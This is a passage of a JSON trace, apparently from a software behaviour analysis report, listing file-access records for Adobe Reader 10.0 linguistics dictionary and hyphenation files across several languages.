10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\fin49.lex.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\fin49.lex.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\fin49.lex", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\fin49.lex", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\finphon.env.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\finphon.env.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\finphon.env", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\finphon.env", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\frn.fca.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\frn.fca.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\frn.fca", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\frn.fca", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\frn.hyp.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\frn.hyp.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\frn.hyp", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\frn.hyp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\frn21.hsp.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\frn21.hsp.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\frn21.hsp", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\frn21.hsp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\frn32.clx.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\frn32.clx.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\frn32.clx", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\frn32.clx", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\frn93.ths.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\frn93.ths.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\frn93.ths", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\frn93.ths", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\gre.fca.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\gre.fca.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\gre.fca", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\gre.fca", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\gre.hyp.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\gre.hyp.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\gre.hyp", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\gre.hyp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\gre110.hsp.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\gre110.hsp.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\gre110.hsp", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\gre110.hsp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\gre32.clx.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\gre32.clx.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\gre32.clx", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\gre32.clx", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\grm.fca.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\grm.fca.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\grm.fca", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\grm.fca", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\grm.hyp.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\grm.hyp.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\grm.hyp", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\grm.hyp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\grm104.hsp.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\grm104.hsp.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\grm104.hsp", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\grm104.hsp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\grm32.clx.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\grm32.clx.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\grm32.clx", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\grm32.clx", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\grm92.ths.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\grm92.ths.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\grm92.ths", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\grm92.ths", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\heb.fca.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\heb.fca.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\heb.fca", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\heb.fca", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\heb.hyp.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\heb.hyp.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\heb.hyp", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\heb.hyp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\heb134.hsp.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\heb134.hsp.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\heb134.hsp", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\heb134.hsp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\heb32.clx.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\heb32.clx.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\heb32.clx", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\heb32.clx", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\hrv.hyp.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\hrv.hyp.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\hrv.hyp", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\hrv.hyp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\hrv132.lex.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\hrv132.lex.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\hrv132.lex", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\hrv132.lex", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\hrv32.clx.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\hrv32.clx.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\hrv32.clx", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\hrv32.clx", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\hrvphon.env.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\hrvphon.env.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\hrvphon.env", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\hrvphon.env", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\hun.fca.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\hun.fca.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\hun.fca", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\hun.fca", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\hun.hyp.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\hun.hyp.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\hun.hyp", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\hun.hyp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\hun109.hsp.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\hun109.hsp.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\hun109.hsp", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\hun109.hsp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\hun32.clx.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\hun32.clx.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\hun32.clx", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\hun32.clx", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\itl.fca.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\itl.fca.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\itl.fca", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\itl.fca", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\itl.hyp.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\itl.hyp.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\itl.hyp", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\itl.hyp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\itl26.hsp.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\itl26.hsp.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\itl26.hsp", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\itl26.hsp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\itl32.clx.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\itl32.clx.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\itl32.clx", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\itl32.clx", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\itl61.ths.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\itl61.ths.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\itl61.ths", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\itl61.ths", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\lav.hyp.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\lav.hyp.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\lav.hyp", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\lav.hyp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\lav135.lex.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\lav135.lex.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\lav135.lex", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\lav135.lex", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\lav32.clx.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\lav32.clx.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\lav32.clx", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\lav32.clx", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\lavphon.env.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\lavphon.env.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\lavphon.env", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\lavphon.env", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\lit.hyp.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\lit.hyp.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\lit.hyp", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\lit.hyp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\lit136.lex.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\lit136.lex.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\lit136.lex", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\lit136.lex", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\lit32.clx.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\lit32.clx.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\lit32.clx", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\lit32.clx", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\litphon.env.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\litphon.env.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\litphon.env", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\litphon.env", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\nrw.fca.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\nrw.fca.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\nrw.fca", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\nrw.fca", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\nrw.hyp.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\nrw.hyp.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\nrw.hyp", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\nrw.hyp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\nrw32.clx.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 